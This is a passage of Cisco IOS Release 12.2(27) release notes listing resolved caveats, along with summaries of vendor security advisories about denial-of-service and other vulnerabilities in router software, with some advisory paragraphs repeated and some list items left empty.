These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
ISO CLNS
•
Symptoms: A 60-second blackhole of an MPLS VPN flow (or any other flow to BGP) may occur when an IS-IS link fails or the metric of the IS-IS link is modified.
Conditions: This symptom is observed on a Cisco platform that functions as a PE router and that is configured for BGP when the following conditions are present:
–
–
Workaround: Disable the ip fast-convergence command. This workaround can only be applied if the platform is part of a network that does not target a 50-msec convergence time. If this is not an option, there is no workaround.
Miscellaneous
•
Symptoms: Spurious memory accesses may occur on a router, and the router may reboot.
Conditions: This symptom is observed on a Cisco router when you poll the cbQosREDClassStatsTable of the CISCO-CLASS-BASED-QOS-MIB. The symptom is platform-independent. The spurious memory accesses may be reproduced when polling the above-mentioned table via Simple Network Management Protocol (SNMP).
Workaround: Prevent the router from answering to queries on the cbQosREDClassStatsTable by implementing the following SNMP view in the router configuration:
snmp-server view qos internet included
snmp-server view qos 1.3.6.1.4.1.9.9.166.1.20.1 excluded
snmp-server community string view qos ro
•
Symptoms: There is no connectivity over an MLP link.
Conditions: This symptom is observed on a Cisco Catalyst 6000 series that is configured with a FlexWAN in which a port adapter is installed. MLP is configured on an interface of the port adapter.
Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the affected interface.
•
Symptoms: A router may reload unexpectedly because of a bus error when access control lists (ACL) counters are sent from a line card or network module to the Route Processor (RP).
Conditions: This symptom is observed when the ACL number is in the expanded range (that is, from 1300 to 1999 or from 2000 to 2699). Note that the symptom does not occur when named ACLs are used.
Workaround: There is no workaround.
•
Symptoms: When an ATM PVC bounces, it fails to come back up and remains in the DOWN/UNVERIFIED state.
Conditions: This symptom occurs when an ATM line card is connected to an ATM switch, when the ATM PVC is managed by OAM, and when the frequency of the OAM F5 loopback cells is set to 0 via the oam-pvc manage 0 command.
Workaround: Reactivate the PVC by entering the shutdown command followed by the no shutdown command on the PVC.
Alternate Workaround: Disable OAM management.
•
Symptoms: When an import map is configured on a VPN Routing/Forwarding (VRF) instance, the CE-learned routes are filtered out, preventing them from appearing in the VRF routing table.
Conditions: This symptom is observed when the import map word command is configured as part of the VRF configuration. Note that eBGP routes are not filtered out.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7500 series T3 port adapter (PA-2T3+) may not provide a two-second delay before bringing down the T3 controller.
Conditions: This symptom is observed when an alarm as defined in the ANSI T1.231 specification occurs.
Workaround: There is no workaround.
•
Symptoms: A learned RIP default route from a next hop router may not be removed from the routing table when the next hop router goes down.
Conditions: This symptom is observed on a router that runs Cisco IOS Release 12.1 or Release 12.2 and occurs only when the router runs both EIGRP and RIP simultaneously. The symptom may also occur in other releases.
Workaround: There is no workaround.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
Symptoms: When you enter the dsu bandwidth kbps command, the router may not change the DSU bandwidth.
Conditions: This symptom is observed on a Cisco router that is configured with an E3 serial port adapter.
Workaround: There is no workaround.
•
Symptoms: A router fails to receive the Integrated Local Management Interface (ILMI) prefix from the switch side.
Conditions: This symptom occurs during the initial negotiation of ILMI parameters. The output of show atm ilmi-status command does not show the configured ILMI prefix.
Workaround: There is no workaround.
•
Symptoms: The ifAdminStatus MIB shows that subinterfaces are up when the main interface is shut down. This situation prevents SNMP from monitoring the proper status of the subinterfaces.
Conditions: This symptom is observed when an ATM main interface is shut down but its subinterfaces are not.
Workaround: Do not use the ifAdminStatus MIB. Rather, use the ifOperStatus MIB.
Further Problem Description: The fix for this caveat ensures that when the main interface is shut down, the ifAdminStatus MIB does show that the subinterfaces are down too, whether or not the individual subinterfaces have been shut down.
•
Symptoms: A Cisco router that is configured for SNASw may reload because of a bus error.
Conditions: This symptom is observed when the downstream port is configured for VDLC (DLSw). The symptom is platform-independent and is more likely to occur in a large, busy SNASw environment.
Workaround: There is no workaround.
•
Symptoms: A PE router that is configured for MPLS may reload.
Conditions: This symptom is observed when an MPLS adjacency is freed while the router performs label imposition on incoming IP packets.
Workaround: There is no workaround.
•
Symptoms: A VIP may crash at "tagsw_flow_get".
Conditions: This symptom is observed on a Cisco 7500 series that is configured for egress NetFlow when any of the following events occur:
–
–
–
–
If a VIP in one slot crashes, another VIP in another slot may crash because of caveat CSCeg23051 or caveats CSCdx14343.
Workaround: There is no workaround.
•
Symptoms: After a router reloads, a permanent virtual circuit (PVC) configuration may be lost from a virtual circuit (VC).
Conditions: The symptom is observed on a Cisco 7xxx series router when the VC is configured under an IMA-group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter.
Workaround: Save the configuration to disk or in bootflash. After the router has reloaded and come up, copy the configuration from the disk or bootflash to the running configuration.
Wide-Area Networking
•
Symptoms: A memory leak may occur in the "Multilink Events" process, which can be seen in the output of the show memory summary command:
0x60BC47D0 0000000024 0000000157 0000003768 MLP bundle name
0x60BC47D0 0000000028 0000000003 0000000084 MLP bundle name
0x60BC47D0 0000000044 0000000001 0000000044 MLP bundle name
0x60BC47D0 0000000048 0000000001 0000000048 MLP bundle name
0x60BC47D0 0000000060 0000000001 0000000060 MLP bundle name
0x60BC47D0 0000000064 0000000013 0000000832 MLP bundle name
0x60BC47D0 0000000068 0000000008 0000000544 MLP bundle name
0x60BC47D0 0000000072 0000000001 0000000072 MLP bundle name
0x60BC47D0 0000000076 0000000001 0000000076 MLP bundle name
0x60BC47D0 0000000088 0000000018 0000001584 MLP bundle name
Conditions: This symptom is observed when two interfaces are configured in the same multilink group or are bound to the same dialer profile.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(27c)
Cisco IOS Release 12.2(27c) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27c) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
•
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
•
Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.
Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.
The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestampMay 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy errorThe error message is then followed by a traceback.
It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.
Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml
IP Routing Protocols
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing.
This advisory is available at:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.
NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.
NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.
NHRP is not enabled by default for Cisco IOS.
This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.
Miscellaneous
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.
Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.
Workaround: There is no workaround.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.
•
Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.
The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
•
Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.
Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.
Workaround: Disable the ip http secure server command.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
TCP/IP Host-Mode Services
•
The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.
This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers.
This issue is documented as Cisco bug ID CSCek37177
There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
•
Symptoms: A router that is running RCP can be reloaded by a specific packet.
Conditions: This symptom is seen under the following conditions:
–
–
–
Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.
Resolved Caveats—Cisco IOS Release 12.2(27b)
Cisco IOS Release 12.2(27b) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27b) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
IP Routing Protocols
•
Symptoms: A router may reset its Border Gateway Protocol (BGP) session.
Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.
Workaround: Configure the bgp maxas limit command in such as way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path value, the prefix is rejected and recorded the event in the log.
Miscellaneous
•
Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.
Cisco has made free software available that includes the additional integrity checks for affected customers.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.
Resolved Caveats—Cisco IOS Release 12.2(27a)
Cisco IOS Release 12.2(27a) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
IP Routing Protocols
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages
Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages
Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
Miscellaneous
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
Resolved Caveats—Cisco IOS Release 12.2(27)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(27). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(27). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: A router may reload due to a software-forced crash.
Conditions: This symptom is observed on a Cisco 3745 that runs Cisco IOS Release 12.2(13)T5 and that has SSH configured. However, the symptom may occur on other platforms that run other releases and that do not have SSH configured.
Workaround: There is no workaround.
•
Symptoms: A system used for reverse connections, such as a console server or other "milking machine" applications, may unexpectedly restart due to a bus error.
Conditions: The conditions under which this occurs are not well understood, but it is likely that frequent, short-lived connections are more likely to cause the problem than environments where connections are either long-lived or rarely opened and closed.
Workaround: There is no workaround.
•
Symptoms: After a VIP crashes, a FIB-3-FIBDISABLE error message due to an IPC timeout may occur for all the slots of the VIP.
Conditions: This symptom is observed on a Cisco 7500 series after the VIP crashes and before the VIP recovers. The FIB-3-FIBDISABLE error message is generated for all the slots of the VIP, causing dCEF switching to become disabled.
Workaround: There is no workaround. You can reenable dCEF by entering the clear cef linecard command.
•
Symptoms: An NTP broadcast client may fail to synchronize with an NTP broadcast server if the server cannot be reached from the client.
Conditions: This symptom is observed in Cisco IOS interim Release 12.2(12.11)T or a later release, including Release 12.3. However, the symptom may also occur in other releases.
Workaround: Ensure that the server can be reached from the client.
•
Symptoms: The Route Switch Module (RSM) fails to boot up and is not listed as a valid module.
Conditions: This symptom happens with Cisco IOS Release 12.2(26) only.
Workaround: Use an older or a newer image than Cisco IOS Release 12.2(26).
•
Symptoms: A specifically crafted Transmission Control Protocol (TCP) connection to a telnet or reverse telnet port of a Cisco device running Internetwork Operating System (IOS) may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases Hypertext Transport Protocol (HTTP) access to the Cisco device. Telnet, reverse telnet, RSH and SSH sessions established prior to exploitation are not affected.
All other device services will operate normally.
Conditions: User initiated specially crafted TCP connection to a telnet or reverse telnet port results in blocking further telnet sessions. Whereas, services such as packet forwarding, routing protocols and all other communication to and through the device remains unaffected.
Workaround: The detail advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040827-telnet.shtml
Interfaces and Bridging
•
Symptoms: Spurious memory accesses may occur on a VIP with a PA-FE.
Conditions: This symptom is observed on a Cisco 7500 series when a raw Ethernet packet is received on the PA-FE interface that is configured as an ISL trunk.
Workaround: There is no workaround.
•
Symptoms: The driver code of a third-party vendor Fast Ethernet controller that is part of a C7200-I/O-FE I/O controller may pause indefinitely or reload unexpectedly.
Conditions: This symptom is observed on a Cisco 7200 series when a packet enters the third-party vendor Fast Ethernet controller, when this packet is forwarded to a Multilink PPP (MLP) interface, and when another packet is forwarded by the third-party vendor Fast Ethernet controller before the first packet has left the MLP interface.
Workaround: There is no workaround.
IP Routing Protocols
•
Symptoms: Pings fail on an Ethernet-to-VLAN interworking over L2TPv3 due to an IRDP failure.
Conditions: This symptom is observed when you ping between two CE routers. Both of the CE routers do not learn each other's MAC address automatically.
Workaround: Ping from the first CE router to the second CE router, then ping from the second CE router to the first CE router.
•
Symptoms: It may not be possible to remove a VRF-based static NAT configuration.
Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 in an MPLS VRF NAT configuration.
Workaround: There is no workaround.
•
Symptoms: A Cisco router may crash when you enter the clear ip route * command.
Conditions: This symptom is observed when the routing table has a default route.
Workaround: There is no workaround.
•
Symptoms: A software-forced reload may occur on a router that is configured with a DVMRP tunnel.
Conditions: This symptom is observed on a Cisco router when the DVMRP tunnel is brought up and routing information is redistributed between DVMRP and MBGP.
Workaround: There is no workaround.
Miscellaneous
•
Symptoms: X.25 encapsulation may not work on interfaces of a Fast Ethernet network module (NM-xFE2W).
Conditions: This symptom is observed when the NM-xFE2W is installed in a Multicast Address Resolution Server (MARS) platform.
Workaround: There is no workaround.
•
Symptoms: T.38 fax calls from one gateway to another gateway may fail.
Conditions: This symptom is observed when you make a T.38 fax call from an originating gateway (OGW) that is running Cisco IOS Release 12.2(13)T and that is configured for H.323 fast start mode through a gatekeeper to a gateway that is running Cisco IOS Release 12.2(11)T2.
Workaround: Configure the voice service voip global configuration command followed by the h323 call start slow voice-service configuration command on the OGW.
•
Symptoms: When polling the cbQosREDClassStatsTable of the CISCO-CLASS-BASED- QOS-MIB, spurious memory accesses may occur on a Cisco 2600 series, Cisco 3600 series, or Cisco 7200 series. A Cisco 3640 router may also reboot. The spurious memory accesses may be reproduced when polling the above-mentioned table via Simple Network Management Protocol (SNMP).
Conditions: This symptom is observed on a Cisco 2600 series, Cisco 3600 series, and Cisco 7200 series that run Cisco IOS Release 12.2(8)T, Release 12.3, or Release 12.3 T.
Workaround: Prevent the router from answering to queries on the cbQosREDClassStatsTable by implementing the following SNMP view in the router configuration:
snmp-server view qos internet included
snmp-server view qos 1.3.6.1.4.1.9.9.166.1.20.1 excluded
snmp-server community string view qos ro
•
Symptoms: A CPUHOG condition may occur on a router, and the router may reload.
Conditions: This symptom is observed when the router has a large configuration that contains several static crypto map statements and associated crypto access control lists (ACLs).
Workaround: Reduce the size of the configuration, which may help alleviate the CPUHOG condition and reduce the likelihood that the router may reload.
•
Symptoms: Under rare circumstances, an Operation, Administration, and Maintenance (OAM)-enabled ATM Permanent Virtual Circuit (PVC) may stay in the down state.
Conditions: This symptom is observed when the ATM interface transitions to the down state and then back to the up state because of a-link related problem or because you enter the shutdown command followed by the no shutdown command.
Workaround: Disable OAM on the PVC.
•
Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled on a Versatile Interface Processor (VIP) or Cisco 12000 series line card (LC), and the following error message may appear on the console:
%FIB-3-FIBDISABLE: Fatal error, slot 12: Window did not open, LC to RP IPC is non-operational
Conditions: This symptom is observed on a Cisco 7500 series VIP2-50 and VIP4- 80 in which ATM OC-3 port adapters such as the PA-A1-OC3 or PA-A3-OC3 are installed when the Cisco 7500 series is upgraded to Cisco IOS Release 12.0(24) S or Release 12.0(24)S1. This symptom is also observed on a Cisco 12000 series LC during significant, prolonged routing table churn.
